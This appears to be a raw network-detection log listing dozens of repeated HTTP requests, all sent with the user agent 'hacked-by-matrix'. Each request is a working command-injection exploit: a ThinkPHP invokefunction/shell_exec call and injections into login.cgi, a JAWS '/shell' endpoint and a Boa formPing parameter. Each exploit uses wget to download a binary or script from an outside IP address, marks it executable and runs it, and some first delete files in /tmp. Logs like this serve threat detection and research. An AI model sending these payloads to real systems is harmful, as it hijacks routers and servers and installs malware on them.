          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
